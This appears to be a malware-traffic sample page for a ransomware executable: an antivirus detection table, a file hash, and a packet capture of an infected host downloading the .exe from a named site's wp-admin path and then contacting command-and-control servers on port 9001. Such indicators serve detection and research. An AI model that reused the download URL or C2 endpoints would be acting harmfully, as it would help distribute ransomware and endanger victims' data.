f915df4a50447.exe Trojan Malware Locky Ransomware Variant PCAP file download traffic sample 84.245.32.195.9001

SHA256: f1fd445efb4124577c1ca3b615b5bc7ee272b213e525d76ae3581961aaf93992
File name: f915df4a50447.exe
Detection ratio: 31 / 56
Analysis date: 2016-10-28 00:41:33 UTC
Engine             Result                             Update
AhnLab-V3          Trojan/Win32.Miuref.N2135633990    20161027
Arcabit            Application.Generic.D373ABC        20161027
Avast              Win32:Trojan-gen                   20161027
Avira (no cloud)   TR/Dropper.ctaah                   20161027
BitDefender        Application.GenericKD.3619516      20161027
Comodo             TrojWare.NSIS.Injector.~GZ         20161027
Cyren              W32/Trojan.FRWW-9040               20161028
DrWeb              Trojan.DownLoader23.460            20161028
ESET-NOD32         NSIS/Injector.GZ                   20161028
Fortinet           W32/Injector.GX!tr                 20161028
GData              Application.GenericKD.3619516      20161027
K7AntiVirus        Riskware ( 0040eff71 )             20161025
K7GW               Riskware ( 0040eff71 )             20161027
Kaspersky          Trojan-Ransom.Win32.Shade.kye      20161028
Malwarebytes       Ransom.Locky                       20161028
McAfee             RDN/Ransom                         20161028
McAfee-GW-Edition  RDN/Ransom                         20161028
eScan              Application.GenericKD.3619516      20161028
Microsoft          Ransom:Win32/Troldesh.A            20161027

2016-10-27 19:26:58.760888 IP 192.168.1.102.55714 > 192.185.89.155.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /wp-admin/f915df4a50447.exe HTTP/1.1
E..[s_@……..f..Y….Pv…..d.P…H#..GET /wp-admin/f915df4a50447.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.bodebarker.com
Connection: Keep-Alive

2016-10-27 19:26:58.867112 IP 192.168.1.102.55714 > 192.185.89.155.80: Flags [.], ack 4381, win 256, length 0
E..(s`@……..f..Y….Pv..”..u.P…T………

E..(a.@…X….fh_…..P…….’P………….
2016-10-27 19:27:40.906477 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET / HTTP/1.1
E…a.@…X%…fh_…..P…….’P…….GET / HTTP/1.1
Host: whatismyipaddress.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

2016-10-27 19:27:41.042168 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [.], ack 4381, win 256, length 0
E..(a.@…X….fh_…..P…….CP….T……..
2016-10-27 19:27:41.042617 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [.], ack 5841, win 256, length 0
E..(a.@…X….fh_…..P……..P………….
2016-10-27 19:27:41.043644 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [.], ack 10221, win 256, length 0

2016-10-27 19:28:17.872524 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 160930:161473, ack 653714, win 1123, length 543
E..Gr.@…N….fT. …#)..|.X..KP..c.P………z4..2..  /K1…. …1….K…B0..Nn…pQ../>u…D.I.>.]X@D….4F….D…..%x%8Q…..’………….l.2.`.l.C….`d$…t.dm..?.ql1.-F;m.Q.).Z…..o.n…..W…L…C….n.3….Rq..Q…S.P:GETCYAjV…y……n….I..m`.8.|..(.t.D…PC.1l.B….f.7…U.K$.7.J…..K.V.gAiOA.P…….|#.x7.\..sWgq!……K7F+……..n.z;(.’..|.oke.>.b….50.2.;…&h..[……-..No…%……h._……0..5..N..D.LL.C….e..
7…I.l.*..:..>..c….*…..0.D…9K..6…C.,;.4……p…Q.k….w…(.V0.n..KD]+..d9.].[..NZ….&.G    ..Z..;o…………’8Za:.q..!..gN.r.<V.D.
2016-10-27 19:28:18.259609 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 161473:162016, ack 654257, win 1121, length 543
E..Gr.@…N
…fT. …#)..~.X..jP..anN………z4..2…,lu….X…^…Yi.H..=hB.iv.h.@………….c…`…..vh..k….\h-.z..,y8$S..^….mKk…Qj]d.<.,0f..1…<….5…[n….#(………”.D.;..^….- ..0..]….7dhx.,.h.A.C….h…w.1|:…3./……u.x..Q…F..;mS..     .G…..D…$UJ..d-.Rw.e.%.z..c’…..8…..O4.f.T..[%
T..9″…/..!……
%.(A..v….}28…….%.M.}…w”…;..M…i9..   KLa.2u.6…..An…,w..$…NW.A……;’  ….](yzU.kfr…j.._…;8…=…F…..f…
P…Ky..D../7!-B:7M…..q?…pj.R….5m…K3… .hm..m].r.*..cY.nA..:
K..5.;.5….yM….k..j..M.(..o.?7…T.].’.y.9.A.

2016-10-27 19:27:26.629771 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [.], ack 4252768411, win 256, length 0
E..(b6@….&…f>…..#)7….|..P………….
2016-10-27 19:27:26.634948 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 0:203, ack 1, win 256, length 203
E…b7@….Z…f>…..#)7….|..P………………..d.}G../.G…T……….!..wY……+./.
.       …..3.9./.5……………www.ownenrs6s3ee5ro.com………
.4.2………….       .
……………………………..#……………………………
2016-10-27 19:27:26.645309 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [.], ack 1489431994, win 256, length 0
E..(qy@…Q….fT. …#)….X…P…MI……..
2016-10-27 19:27:26.650316 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 0:213, ack 1, win 256, length 213
E…qz@…P….fT. …#)….X…P………………….;.5CA..t.p+”.-|H.l…..Us…….+./.
.       …..3.9./.5………&.$..!www.ymjb2hdjgpwuwhglgdbu4e4z2.com………
.4.2………….       .
……………………………..#……………………………
2016-10-27 19:27:26.650888 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [.], ack 885415177, win 256, length 0
E..(..@…n….f.e.|…..gH.4.] P…{g……..
2016-10-27 19:27:26.665290 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [P.], seq 0:213, ack 1, win 256, length 213
E…..@…n….f.e.|…..gH.4.] P…O………………………..r…V.aeQ…`.p……+./.
.       …..3.9./.5………&.$..!www.nchssxvzzddce7uyfkpoelzal.com………
.4.2………….       .
……………………………..#……………………………
2016-10-27 19:27:26.746653 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 203:329, ack 750, win 253, length 126
E…b8@……..f>…..#)7….|..P………..F…BA.,`;e…/..C%…..b.OP
.|…..sC…..Hf…DC.QH..K..m…K~.$.hJ.5……….(.pP.J….`……..t…T..w*.F.f.n…….
2016-10-27 19:27:26.769845 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 213:339, ack 745, win 253, length 126
E…q{@…Q….fT. …#)….X…P…_…….F…BA.*..’4..3</..X….B…yO.h!;j~.!…!.R./…….,v…A.>..”… 4.B……….(..z4..1.`}’uoV./…………R.@..RS1..s|
2016-10-27 19:27:26.787920 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [P.], seq 213:339, ack 754, win 253, length 126
E…..@…n^…f.e.|…..gI.4._.P………..F…BA….5nw…]x’~…..U.>.z”.3X.+|H.~{….BA~.?……)=$d.$\…R-.3………..(………b-mt     (A.q.RTT.?…..O”..{…S..
2016-10-27 19:27:26.866549 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 329:367, ack 801, win 253, length 38
E..Nb9@……..f>…..#)7..G.|..P…W…….!.pP.J….. .F%T..7Yx4….7……[
2016-10-27 19:27:26.872561 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 339:377, ack 796, win 253, length 38
E..Nq|@…Qg…fT. …#)..      4X…P….^……!..z4..1.R…q.Gw!x..].2…qC…..
2016-10-27 19:27:26.908008 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [P.], seq 339:377, ack 805, win 253, length 38
E..N..@…n….f.e.|…..gJ94.`-P….w……!……./…..2..\..S.A.D……YQ.
2016-10-27 19:27:26.971056 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [.], ack 2316, win 256, length 0
E..(b:@….”…f>…..#)7..m.|!.P………….
2016-10-27 19:27:26.972049 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 367:910, ack 2316, win 256, length 543
E..Gb;@……..f>…..#)7..m.|!.P…V………pP.J…n.HW….]……….’…K…..zh…}MC…i……..c..1…A……br~…x.ZQ….^[….._.._..K……Wi>9:i..j., .i..s….rE^..>.*.4..|u ..7..h..n..>.>/1v……4.j_\b…..N^E…..f4z.S..Q.5..}1…..t..’ R.M8~….
…T.s.u)z1s.h…%..W….K|.F.L..`aD..;&….ZY…..6C…D…..m…..G….l..$……k..&.b…2.$X..qbi. P,%T…….-A…J..@%p..^X]..W.X…….k`_’..
X.3..e`E…..l.%n.0Qdi…wh.~..i..D~E…Q.n..:…n@..?.Q.s..m.”…x.0u.jc.      .!..    L:……f..e..B…)..j..
…XiK…Zk.`..nOh{.*x%2……..”]….lS…8..SMg=.U.~S.wt.7/..z/.y
